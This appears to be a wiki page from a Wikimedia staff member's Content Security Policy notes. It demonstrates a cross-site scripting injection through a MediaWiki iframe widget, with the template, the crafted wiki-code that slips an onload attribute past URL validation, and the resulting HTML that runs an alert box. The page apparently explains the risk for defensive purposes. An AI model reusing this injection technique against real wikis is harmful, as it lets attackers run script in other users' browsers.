User:BWolff (WMF)/CSP/4

Example

edit

For example:

The iframe widget is defined as:

<includeonly><iframe src="<!--{$url|validate:url}-->" style="border: <!--{$border|escape:html|default:0}-->" width="<!--{$width|escape:html|default:400}-->" height="<!--{$height|escape:html|default:300}-->"></iframe></includeonly>

If we have the wiki-code

{{#widget:iframe|width=0|height=0|url=https://example.com/"onl{{safesubst:ns:0}}oad="alert('All\40your\40base\40are\40belong\40to\40us')}}

Results in the HTML:

<p><iframe src="https://example.com/"onload="alert('All\40your\40base\40are\40belong\40to\40us')" style="border: 0" width="0" height="0"></iframe>
</p>

Which causes All your base are belong to us to show up in a pop-up box.

next